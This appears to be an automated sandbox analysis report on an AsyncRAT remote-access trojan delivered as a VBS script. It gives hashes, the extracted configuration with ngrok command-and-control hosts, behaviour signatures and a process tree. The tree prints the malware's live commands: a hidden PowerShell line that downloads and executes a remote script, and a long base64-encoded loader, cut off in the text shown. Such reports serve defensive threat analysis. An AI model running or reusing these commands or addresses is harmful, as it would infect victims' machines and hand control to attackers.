asyncrat | 407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549

Analysis

max time kernel
97s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 22:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7166_output.vbs
Size

60KB
MD5

dcaadf5b6a871821a09e8be7f12603b0
SHA1

49c943609633112b80fe7b50c79ca6eb072eb3be
SHA256

407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549
SHA512

e18a9bda8f0efeb8bc490b320f86b14a7bc3fb667af4c193b9159d780aabe11da48bec08a6d605f2f08c65d661b5f8e572bf52e5fd712735196d46ea68a15db8
SSDEEP

1536:akm3NbS839HXCQHXFNx7X+xW7lflsAmPUoLlXBCbB:aLl3pCQ35+EDu3y

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:2024

127.0.0.1:15509

127.0.0.1:11979

2.tcp.eu.ngrok.io:6606

2.tcp.eu.ngrok.io:7707

2.tcp.eu.ngrok.io:8808

2.tcp.eu.ngrok.io:2024

2.tcp.eu.ngrok.io:15509

2.tcp.eu.ngrok.io:11979

5.tcp.eu.ngrok.io:6606

5.tcp.eu.ngrok.io:7707

5.tcp.eu.ngrok.io:8808

5.tcp.eu.ngrok.io:2024

5.tcp.eu.ngrok.io:15509

5.tcp.eu.ngrok.io:11979

Mutex

rBBszd57Gkh8

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3124-134-0x0000000007400000-0x0000000007412000-memory.dmp	family_asyncrat

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	Process
7	3948	powershell.exe
38	3124	powershell.exe
40	3124	powershell.exe
43	3124	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
524	powershell.exe
3124	powershell.exe
3948	powershell.exe
3064	powershell.exe
1020	powershell.exe
436	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

Processes:

flow	ioc
37	5.tcp.eu.ngrok.io

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WScript.execmd.exepowershell.exepowershell.exepowershell.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
3160	taskkill.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
3948	powershell.exe
3948	powershell.exe
3064	powershell.exe
3064	powershell.exe
1020	powershell.exe
1020	powershell.exe
436	powershell.exe
436	powershell.exe
524	powershell.exe
524	powershell.exe
3124	powershell.exe
3124	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	3160	taskkill.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeIncreaseQuotaPrivilege	524	powershell.exe
Token: SeSecurityPrivilege	524	powershell.exe
Token: SeTakeOwnershipPrivilege	524	powershell.exe
Token: SeLoadDriverPrivilege	524	powershell.exe
Token: SeSystemProfilePrivilege	524	powershell.exe
Token: SeSystemtimePrivilege	524	powershell.exe
Token: SeProfSingleProcessPrivilege	524	powershell.exe
Token: SeIncBasePriorityPrivilege	524	powershell.exe
Token: SeCreatePagefilePrivilege	524	powershell.exe
Token: SeBackupPrivilege	524	powershell.exe
Token: SeRestorePrivilege	524	powershell.exe
Token: SeShutdownPrivilege	524	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeSystemEnvironmentPrivilege	524	powershell.exe
Token: SeRemoteShutdownPrivilege	524	powershell.exe
Token: SeUndockPrivilege	524	powershell.exe
Token: SeManageVolumePrivilege	524	powershell.exe
Token: 33	524	powershell.exe
Token: 34	524	powershell.exe
Token: 35	524	powershell.exe
Token: 36	524	powershell.exe
Token: SeIncreaseQuotaPrivilege	524	powershell.exe
Token: SeSecurityPrivilege	524	powershell.exe
Token: SeTakeOwnershipPrivilege	524	powershell.exe
Token: SeLoadDriverPrivilege	524	powershell.exe
Token: SeSystemProfilePrivilege	524	powershell.exe
Token: SeSystemtimePrivilege	524	powershell.exe
Token: SeProfSingleProcessPrivilege	524	powershell.exe
Token: SeIncBasePriorityPrivilege	524	powershell.exe
Token: SeCreatePagefilePrivilege	524	powershell.exe
Token: SeBackupPrivilege	524	powershell.exe
Token: SeRestorePrivilege	524	powershell.exe
Token: SeShutdownPrivilege	524	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeSystemEnvironmentPrivilege	524	powershell.exe
Token: SeRemoteShutdownPrivilege	524	powershell.exe
Token: SeUndockPrivilege	524	powershell.exe
Token: SeManageVolumePrivilege	524	powershell.exe
Token: 33	524	powershell.exe
Token: 34	524	powershell.exe
Token: 35	524	powershell.exe
Token: 36	524	powershell.exe
Token: SeIncreaseQuotaPrivilege	524	powershell.exe
Token: SeSecurityPrivilege	524	powershell.exe
Token: SeTakeOwnershipPrivilege	524	powershell.exe
Token: SeLoadDriverPrivilege	524	powershell.exe
Token: SeSystemProfilePrivilege	524	powershell.exe
Token: SeSystemtimePrivilege	524	powershell.exe
Token: SeProfSingleProcessPrivilege	524	powershell.exe
Token: SeIncBasePriorityPrivilege	524	powershell.exe
Token: SeCreatePagefilePrivilege	524	powershell.exe
Token: SeBackupPrivilege	524	powershell.exe
Token: SeRestorePrivilege	524	powershell.exe
Token: SeShutdownPrivilege	524	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeSystemEnvironmentPrivilege	524	powershell.exe
Token: SeRemoteShutdownPrivilege	524	powershell.exe
Token: SeUndockPrivilege	524	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

WScript.exepowershell.exepowershell.execsc.execmd.exepowershell.exeWScript.execmd.exe

description	pid	Process	procid_target
PID 1224 wrote to memory of 3948	1224	WScript.exe	83
PID 1224 wrote to memory of 3948	1224	WScript.exe	83
PID 3948 wrote to memory of 3064	3948	powershell.exe	85
PID 3948 wrote to memory of 3064	3948	powershell.exe	85
PID 3064 wrote to memory of 4044	3064	powershell.exe	87
PID 3064 wrote to memory of 4044	3064	powershell.exe	87
PID 4044 wrote to memory of 4104	4044	csc.exe	88
PID 4044 wrote to memory of 4104	4044	csc.exe	88
PID 3064 wrote to memory of 3520	3064	powershell.exe	91
PID 3064 wrote to memory of 3520	3064	powershell.exe	91
PID 1224 wrote to memory of 2548	1224	WScript.exe	108
PID 1224 wrote to memory of 2548	1224	WScript.exe	108
PID 2548 wrote to memory of 436	2548	cmd.exe	110
PID 2548 wrote to memory of 436	2548	cmd.exe	110
PID 2548 wrote to memory of 436	2548	cmd.exe	110
PID 436 wrote to memory of 524	436	powershell.exe	111
PID 436 wrote to memory of 524	436	powershell.exe	111
PID 436 wrote to memory of 524	436	powershell.exe	111
PID 436 wrote to memory of 4400	436	powershell.exe	116
PID 436 wrote to memory of 4400	436	powershell.exe	116
PID 436 wrote to memory of 4400	436	powershell.exe	116
PID 4400 wrote to memory of 3160	4400	WScript.exe	117
PID 4400 wrote to memory of 3160	4400	WScript.exe	117
PID 4400 wrote to memory of 3160	4400	WScript.exe	117
PID 3160 wrote to memory of 3124	3160	cmd.exe	119
PID 3160 wrote to memory of 3124	3160	cmd.exe	119
PID 3160 wrote to memory of 3124	3160	cmd.exe	119

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7166_output.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand DQAKACAAIAAgACAAJABSAE8AcQBGAHcAZwBvAEEAIAA9ACAAMgA1ADEAMAANAAoAIAAgACAAIAAkAFMAagBYAFEAVQB4AGIAWAAgAD0AIAAoAFsATQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABZAEgAWQBVAHIAZgBPAHoAKQAgACoAIAA0ADQAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkADQAKACAAIAAgACAAJABKAFMAVQBTAG0ATQBVAFkAIAA9ACAAIgAyACIADQAKACAAIAAgACAAJABVAGIAZQBFAGMAWQBPAGYAIAA9ACAAIgBTACIADQAKACAAIAAgACAAJABVAGQATwB3AEsAZgBJAHgAIAA9ACAAIgA2ACIADQAKACAAIAAgACAAJAB6AEQAZQBiAG4AeQBBAEYAIAA9ACAAIgBWACIADQAKACAAIAAgACAAJABzAE8AcQBWAE4AWABWAGYAIAA9ACAAIgBHACIADQAKACAAIAAgACAAJAByAG8ATwBaAHEASQBhAHcAIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAEEAZQB5AEUAagBoAEMAIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABQAFEAWQBzAFAAbABBAGcAIAA9ACAAIgByACIADQAKACAAIAAgACAAJABPAFAASQBhAEYAZABaAEcAIAA9ACAAIgBxACIADQAKACAAIAAgACAAJABtAHUAZwB3AEgAdwBpAE4AIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABnAFIASABxAEcAeQBYAEUAIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABmAEIAbgBsAE0AQgBaAEYAIAA9ACAAIgBGACIADQAKACAAIAAgACAAJABFAE4AZQBYAGYATwBOAE4AIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAFMATgBGAHIAWgBCAEcAIAA9ACAAIgBKACIADQAKACAAIAAgACAAJABuAHgASgBGAEkAYgBSAEQAIAA9ACAAIgBiACIADQAKACAAIAAgACAAJABPAEYAVQBGAFoAYQBiAFoAIAA9ACAAIgBrACIADQAKACAAIAAgACAAJAB0ADEAIAA9ACAAOAAwACAAKwAgADgAOAANAAoAIAAgACAAIAAkAHQAMgAgAD0AIAAoACQAdAAxACAAKgAgADQAKQAgAC0AIAAoACQAdAAxACAALwAgADkAKQANAAoAIAAgACAAIAAkAHQAMwAgAD0AIAAiADIAIgAgACsAIAAiAFMAIgAgACsAIAAiADYAIgAgACsAIAAiAFYAIgAgACsAIAAiAEcAIgANAAoAIAAgACAAIAAkAHQANAAgAD0AIAAiAEsAIgAgACsAIAAiADcAIgAgACsAIAAiAHIAIgAgACsAIAAiAHEAIgAgACsAIAAiAGwAIgANAAoAIAAgACAAIAAkAHQANQAgAD0AIAAiAGwAIgAgACsAIAAiAEYAIgAgACsAIAAiAEsAIgAgACsAIAAiAEoAIgAgACsAIAAiAGIAIgAgACsAIAAiAGsAIgANAAoAIAAgACAAIAAkAHAAIAA9ACAAJAB0ADMAIAArACAAJAB0ADQAIAArACAAJAB0ADUADQAKACAAIAAgACAAJABhACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABwACkADQAKACAAIAAgACAAJABkACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgB0AEQAYgAvADEAWABhADAAVQBNAHUATgBlADMASwBzAFoAawB3AEEAYgBvAEUAaABtADQAUgBEAHkAWQB4AHQAKwBxAGoAZQBFAEUAdAA3AHoAdAA0ADAASQBPAFQAdwBrAHgAdQBmAG8AcgBnAE0AbwB2AEUAUAB3ADUAZAA1AHYAaQBaAEIAdwBiAHMAZAAvAFkAZgBQAE8AMgBZAHkARABjAEMAaQBkAFQAQQB0AGwAYgBXAHMAUQB4AGUAVgB2AE8AQwBxAE4ARABPAHgAVAB4AGcAcgBDACsAOQBGAEIAYgBKAEcAKwBkAHIASwBHAEwAUgBkAFgAaQBXAGgASgByAHAAVwBjAHcAWgBBAEoAYwA3AEQAMQBPAFgAUgBNADMAcwBJAEgAUABwAEUARQBPAFEAZwB2AEoAQQBqAFkAdQBRAE0AWgBCAFcARwBOADcAeABZAEwAVwBXAHcAUQBoAHEAcgA3AEgAYwB0AEUARgBuAEUAdwA1ADgAbgBlAFIAbABlAFMAMgBLAFEALwAxADkANQBvAEsAQgBuAEwAawBiAEMAdABsAHAAegAxADIATQBSADUAYgA2AFIATQBZAFoAcgBvACsAZgA5AEIARQArAFcAcQA3AHoARwBIAFAAeQA5AC8AQwBSAE4AbAA5AFUAUwBRAGQAMgA2AGYAcgBNAFoANgArAFQAawBSAGkAYQA1AEgAbQBnAHQAbgA5AG0AUgBTAHcATQBYAEoAaQAxAC8AbgB2AGIAWgAwAFgAagBzAFcAcgBDACsAMQBIAGgAYgBPAHYAOABEADAANQBsADYAeQA4ADUAWABlACsATwA5AGMAOAA2AGYAWAB2AFcAMgAzADcAQwBpADgANwBWAEcAUABpACsARwBqADEATwA5AGQAcAA5AEgAMQA2ADAARgBQAEcAOAAwAE8ANwAzAGwAVwBRAEsAaABYADYAQwB2AFEAVgBiAHAAagBpAEEATQBJAGMAWQBXADcAWQBpAGIAcgBwADEAVgBCAGgAUwBLADIAQgBrAEQAdgB5AEcAKwBaAFQANgBWAGIAawBoAFIAMgB3AGQAOABaAGoAeABCAFoASgBDAE0AVgBLADUASQAwAGQAYgB1AHYANwBVAGoAUgBVAE8AVQAzAEEANgBqADgANgA0AFcATAA1ACsAUwBJAEIAegBvACsAaABHAHcAQgArAFYAMABiAHYAUABwAGoASgBMAFYAVAAzAE8AdgBGAFcAVgBEADIAZgBXADAAbAA0AFAAQQBGAFkATgBXAG4AeQBJAGQAbwBoAFcAawBVADgAVgBXAEkAOQAyACsAWABjAFMATAB4AFkAdAAxAFUAbQBpADIATABuADQAYwA2AEcAZwBKAGYARQBBAFEANwBXADcAeABiAEEAWABSAHEAMwBlAEYAcQBkAGsATgBOADQAZQBvAEcAVABYADgATwBSAEgAZABCAFkASQA3AFcAZQAyAGcAZwBFAFoAcgBJAEUAWgBWAHkAMAA5AGsANgBrADQAOQB4AHQAaQBDAGUAZQBIAHgAVwA2AGoAQQBtADQASQB2AHkAYQBmADIATgBNAEMAbgBtAFMARABoACsAaQBwAGQANgBVADYAQQA4AFIAOABTAHAATQB3ADQAeQA3AGUAbABFAEgAKwA2AGcAQQBlAGYANwBaAG4AMwBEAEkAcQBtAHkAUwBxAG8AUAB4AE4AaABzAGQAMwBWAHMAeABEAFoAbwBoAEkAKwBlAE0ANQA1AGsAWABlADQAZABxAGYAVAA2AEsATAArAEkASgBoAGQAdgAyAGoAWgBaAHcAegBUAFMARwBmAGMAbQBiAHMAdwAwAEcAZwAyAGIAeABHAGcARwBjAHUAeQB2AHAAdABTAE8AcQB0AFEASAAxAHoAUwBzAGkARAA3AFcAVABlAFUAZgBYAFAAMQBZAGMAVABNADMANQBzAGIAegBXAFoAeQB0AHgATABvAHcAaABzAFIARQBkAGYANQBZAFgAOQBXAFcAYQBtAFYAOQAxAGEAOQBtAGEAUQBKAGYAcwAvAE8AOQA4AHIAUwB5ADIAaABpAG4AdwBHAFAANwB6AEYAMwBkAHAAVABSAFMAMwArAFIAbgBDACsAdQBqAEUAZAB4ADAANwA2AEEAbgA5AHQAUQBKAEQAUgByAE8AaQBGAHkANQBrAFAAbQA0ADgAVABUACsAcgBZADcAagBpAGYAVwBXAHEAcgBmAE4ANQBWADAAKwBJAHoAdQBuAHEASwA1AHIANABZAEYATAA0AHAAUABKAGkAWQBZADEANwA2AFgAWQBHAGcATAAxAEMAdwBKAEcATABwAHcAeABjAFoARwBzAC8AQwBUAHgAUwAvAHkAcQAwADIAbgBtAFoARABjAG8AaQBnAGUAMgA0AHgASgBnAEcAUwBYAGEAdABKAGUAdQArAGYATgBwAEQAQgBFADQAZQAzAGoAdgB1AHEAVQAzAEcAaAA0AFYAMwBiAE0ASwA0AEoAOQBRAFcAeAA2ADAAZABsAFAAMgBYAE0AegBjADgAZQBLAFEAUQBiAC8AQgBqAFUAZQBUAE0ALwB3AHEATwBqAG8ASwBjAG4AWQB5AHgANQBSAHoAYwA4AFIASgBLAEIAdABvACsATQBUAGMAQwBHAEEAegA4AHgATAA5AEIANwAzADAAagBUAE4AVAB1AEkANQBMADQAOQBIAHEAcABaAFcAVwBiAFcAQgB0ADMAbQBPACsAVwA2AG0AUgBvAFAAcgBkAHgAdABlAG4AeQBRAGwASgAyAEkATQAxAHIASQBDAGoAYwBzAC8AaQBWAHAAMgBaAG4ANQBCAFEAQwBlAEIAWQBTAEUAWABCAEYARQBMACsARwBlAFIAbABCAFoAcAAyAEoANgBoADAAZQBEAGEASwBqADIAOQB3AFEAVQBsAEsAVQB4AEsAUAAzAGMAbgBFAEYAQgBaAGkATwAxAHIARAAwAGgALwBwAFQAMwA1AEgAdwBSAGoANwB3AEwAUAA4AHoASQA4AGwAYwBBAE0AcABoAGoAMABKAGsAQQA3AE8AegBqAHoAMQBUAEYAQQA3AFQAUQBwAFkAdgB2AGMARQBDAGcASgBlAGwARgBEADYARgB6AEQATgA5AHcAZgBaAGMAQQBSAEEAcABzAHMAegBOAGkATABCAHUATABrAEoANwBwAGwAbgBtADkAWQBzAEMAbgBSAGUAWQBiADEAZABTAFIAbwBEAHEAcgBjAEkALwBsAHEAWgBrAC8ATAA1ADUAaABZADgAbQBGAGUAMAAvADQAWgBFAHgARwBuAGEAMQBRAHkAbgBXAE0AawB6AFkAdQBtAG0AdABhAHcAcQAvAGYAOQB6AG0AQwB3ADIAUQBzAHUASAA4AFMARgBhAHgAOABuADkAcABQAFcAbgBpAFQAOQB3AEkAYwBRAHQASwBkAGkAUwBZAGEAVwBlAGgAcgBuAGIAWQBGADgAbgBaAGIASQBmAEsAQwBqAFkANABCAFYARQBjAEoAOAB0ADQARQBlAFIAZABtAHAATwBnADcAOABvADQAZwB0AEIAKwBjAEsAQQBGAGEARQBIADEAVwBoAGUAUgBvAFUAUABPAE4AMwBCAFUATQAvADQAMwBzAGEANQBWAG4AdgBiAEIARgBCAE0ASwBJAFYATgBwAGUAOQBFAFkAVQByAE0AcgBKAHIATwBMADYAQQBQAFcASQBGAGsANgBDAEsAcwAwAFIAeQBMAGIAdwBPAFcARABZAEIAegBYADYAUgAyAC8AUABIACsARABDAFEAQQBuAEkAQwBFAHYAVwB4AHcAUwA5AHAASgAzAFEAeQBWAGYAVgBGAGUAdgBUAGUANwBXADgAYwBjAHkAUABuADYAVABOAFUANwBCAGcAbgBmAEQATwBUAEgAUgB2ADUAdQBzADMAbQBxAHQAdAB5ADgAMAB1AHEAKwBZAHYASgBxAG8AWABmAGEAcQBsAG8AWABLAGEAZwBIAGoAWQArAEsAegA2AGoANQBxAEoAQQBBAE4AKwA0ADIAVgBCAHgAbAB1AGkATgBhAGcAbQBnAG4ATABvAHkANABRAGsAQQA4AEYAYgBDAEcAeABEAE0AcgBXADMAMgBoAHkATgBuAFMAZABoADYAOQBwAFUAMQBLAEMAagBVAEMAMABwAHEAawAvAGEAVgB3AGoASABtAFIASgAzAGMAOQBFAGMAZQBrAHQAdgBJAGgARwBLAGYAMgBxAFMAUABPAHkAcgBCAFMAVwBNAFUAbgA1AEUATwA3AEUAdQArAG8AUgB0ADIAVQA5ADgAdgBGAG0AcgA1AGEAVQBsAEUAMwArAEgAQwBMAGoASABMAHEAbABzAEsALwBuADMATwA4AGkAcwB6AGYAUAB6AGgAcgA3AGwAZwBQAGkARgBpADEAZQBoAG4AMgBDAHIAWgBqADMAbABuAEgAUgBHAEQAZQBnADkAMQBhAHMAYQBsAGIAMQBNAEMAdQAzAGYAZgBJADYAWABNAG0AKwA0AFIANwB1AEIANABGAFQAaQA3ADgAOABnAEYAaABjADcAVgBLAE4AbgB2AGgALwA1ADAAawB3ACsAOQBOAGIAYwAxAHkAZQBNACsAZgAvAEkAdwBNAHkAVgBVAGMAWAB5AG0AeQAyADUAcQA4AGQAUgB1AGMAawBlAFgAaABYADgAZQB5ADUASgAvAHkAcABrAGEAVgBzAHIAcABOAEsANQBaAEIAVAB3AHUAZgBuADkAOQBxAHcAWABiAHoAZwAvAG4AeQBYAHAAQwBhAEEAbwA2AFcAYwA0AG0AUQBSAGQAUwBVADkAcAByAGoAcQByAEcAZgBqAE8AQwBtAHYAeQA1AFUAYgBvAEMAOAAwAGgAVgBhAGoAWQBjAFIAUgAxAFYAcgBQADEATQBvAGoAUgAyAHQAOABIAEkASgB4AFcATABYAEwAMQAwAEYARAB3AE4AQgBCAHAAUAB3AFEATgBYAGwATgBPAFIASQB4AGYARgBiAGQAdgB5AGMAVwBzAFAAWABxAEcAZABSAHYARAB6AFQAUwA1AFEAbQBpAHkAeABIAHUAZwBlAGsAeAA1AFQAWQBwADMAcABQAFMAaQBJAHUANwBPAHYASwBXAFcAbgBaAGkAZQBwAE4ASQBoADYAZwAwAHUARQB3AHcATgBzAGgAdQBuAFMATABpAGUAZQAyAFUAbwBLAFgANwBOAHMASQBhAGYARQBFAHYAZQBhADYAMgBBAEgAaABQAEgAOQBpADYAWgBWAEgAUAAxAGgASgBhAFAAYgBDAFcAaABOADkAMwAwADEAdgBNAE8AbABwAEsAMwBuAEMAQwBzAFMALwA1AHgAZABKAG4ARABlAFoAegAyADkASgB3AFUAZgBXADcAeQBBAGcARgBXAHUAaQA5ADMAUgB2AE4ANwBDAEMAdABBAEIAYgB0AEUAVABQAGgAOABPAFgARQBQADYAVgA0AFkAZABLADMATQB6AGEAdAB6AG4AVQBBAFMAQwAvAFAASAB6AHcAWQB4AG4ANwBuAEgAVQArAFEATABxAC8AZgBJAG8ARABIAGUAagBmAFYAVQBvAE8AMwBDAGcAcwBYADYAaAA4AFoAbgBoAEoAMABCAEUAYwB5ACsASABzAGUAWgBNADEAWQAyAGYANgBmAHgAcABwADIAdABFADkAbQBlAEkAagBRAHcAcQB5AGMARgB5AEMASwBoAFQASwBtAGgAYwBZADgAYgA4AEUANgBpADYAcAA3AE4AbQBSADUASgBhADMAWAA0AEkASwBMADkAUQAzAGkAdAB1AHkAbQB2AGIAaABLADAAYgBoAHYAYgByADkAYgBCAGQAQwBNAGgAYwBLAEUAMQBBAEgAbwBBAEMAdwBjAG4ASABFAGIAaABxAHYAbwBFAG8AdQBOAG4AbQBqAGQAeQAyAEMAdABJADIAWABCAEYAbQBUAG4ARQBhAFoAbwBiADIAagBOAGoAVgArAE0AUwA3AEkAYgBiAHcAVgBSAHcASQBXAHIAYQB1AEQATQBVAFUAUgB6ADkARABvADgAMAA2AGUAdwArAHoANQB0AFYAeAAzAG4AYwBzAE0AUgBHAEQASwBZAFIATABWAE4AMgBlADcAWQBjAE8AOQA3AEoAZgBhAEQAQgBhAGEAdgAvAHIARQA4AHAAeAAyAHAAaAAzAHUASgBhAE4AZABTAFIANABFAHkAOABQAHkAZwBqADEARwB4ADAAWgBMADEAUgArADYAZgBWAFcAaABnAHYARABrAGkAagBSAGsAWAA5AG4ATAAxAFkASwBVAHoAaQBLAG8AaABJADEAUAB1AHAAbwAyADkAKwB1AG8AWgAzAHYAMQBYAFEANABUAEcAYQBxAEQANQA0AHEAOQBoAFMAcQB1AFoARABDAFMASgA0ADAAaABpAEgARABVAEwAUgBEAHcAZAA4AEQAZQBqADMAMQBqAFAAcQA2AC8AegBzADEAZQBBAEIAaAA0AGkAUQBIAGoAbwBNAHQAQQBIAGYAVwB6AGgAQQB1AEwAeQBaADUATgBOAFIARwBkADYAdABhAFEANgBVAGgASgBTAGkAbABGAHYAdQA1AGsAWQBxAGsAbgB3AHcAYwBTADcAZgBjAGIAVgBuAFYAbQBlADQASgBZADUANQBWAGQAKwBwADIAZAAvAGEAZgBSAGYAcABNAEEAawBOADUANgBHADIAWgBBAEYAcQBJADgARABtAEcAVABFAGQAcwBDAFAAWABwAHAAVQBoAGsAOABhADYAUABWAGwAMQBHAFUAUwB1AGIAWgBiAGUAQgBPAE8AOABNAGgAUQBRAFQAZgBnAEsAbQBIAGgAWQBUAFcAQQB0AE4AQwBsADMANABEAHgAcwBRAHMATABxAFIAZAB4AHQAdgA3AEMAVgBaAGMAQgBaAFAAYgBsAGUASQB4AEEAeQBzADMAQwA3AEUANgBkAG8AcABkAHEAdABRAGQAVwBMAFUAQgBuAHUAUwA4AEIAaABoAEIAUQBBADgAQQAwADcAawBjAHAANwBrAHoARwBEAHgAQwBiAEQAeABRAHEAeQBIADQAdwA2AFMARgBFADMAbwB2AEwANQBPAEYAUgBMAFMAcwBLAEYATwA0AEgAOQB6AGIAawBDAFYAUwBUAGkAVQBIADgAYQBUAHQAMQAxADMARgBqAHIANQBMAHAAVgBFAEkAMgBvAFoATwA1AGkAdABQAHAAcgA4AEMANgBYAEEAQwA4AFAAbQBKAGkARwArAEUAaQBOAGMAMQBKAE0AUABQAGgATQBUAHEAbgB1AGoAYwBPAHUAUQBpAGsAcQBzAHIAUwB6ADIAaAB1AGwAaABxAEIAZwB2AGQAdQBYAEQAZgAvADEARABaAGoARABHADMARwBnAE8ASgBkAHcAOQA2ADgAWQBjADQAMwBuAFkALwB5AE4AZgBoAGwAOQBtAG8AdAByAHQAagBiAGQAQQBuAHIAcQBnAHUARABqAEgAWgBGAHgAVwBTAEYAVwB0AFcAeABWAE8ATgBTAHIAcgBNAHAANQB1AGcAMQBSADgAVwB5AHAANgBGAFcASQA3AHYANAA1ADgAbABOAEwAZwA4AHQAbQBKAHEAUwA0AG8AKwBFAHcAZQBxAEEATQArAG8AZgBmAHoAawBQAFEALwAvAHMAUwByAEQAMwB6AEgAdQBSAGYAdgAxAEwASQBCAHcAbgBDAE4AVgBRADIAUgBkAEkARAAwAHAANQBWAFMAKwBhAFUASgAyAGUAcABVAHYAWQByAEIAbQBLAGwAbQB2AGIANQBDAFYARwBpADkARQBMADQAbgBWAEUAbwBHADkAVwBHAHgAZQBDAG4AdABYAEMARgBVAGsARgBmAGkAYgBZAE4AYQBSAGkAdQA4AHMAbwBXAEgASwBxAE8AUQBiAHYAVwBEAG0ATABOAGYASwA1AEYAbQBhAGwAVABIAHIAQwBBAFQAZQAvAEUAMwA5AEwARAAvAEwANQA0AEgASgBQAFAAYQBkAHoAOQBrAFAARwB6AHUASABKADkAWQBlAHMANABnAGsAbQA2AGkATQBnAHcATwBBAEEARgBwADQATABFADUAMQB2ADQAdQBDAFoAOQBMAEYAWAA1AEcATQBYAEoAYQBnAEMAOQBHAHIAQQBpAFUAQwAzAGYAcwB5AFcAaABEAFAAVQBLADgANwBaADEAcAAwADAAVAB4AFgAUgBFAEcALwA0AFkAYgBSAEMAYwA1AHoASwBQAEkAMABhAEIAVgBWAHkAQgBjAGEANAA4ADMAWgBOAFoAVwBiAG4ASAB2AHIAYgBNAHUAUABCAEoAQwBoAHAAVQBTAHIAYwBHAE4ARwByADgAdABBAGcAcABmAE0ANgAzAEQANwB3AEYATABXAE0ATQAzADAAVgBOAG0ATgB4ADIAUAB3AEUAcgB5AC8AWgBNAE4AbgBVAFkAbgBSAEoAMwBCAHYAU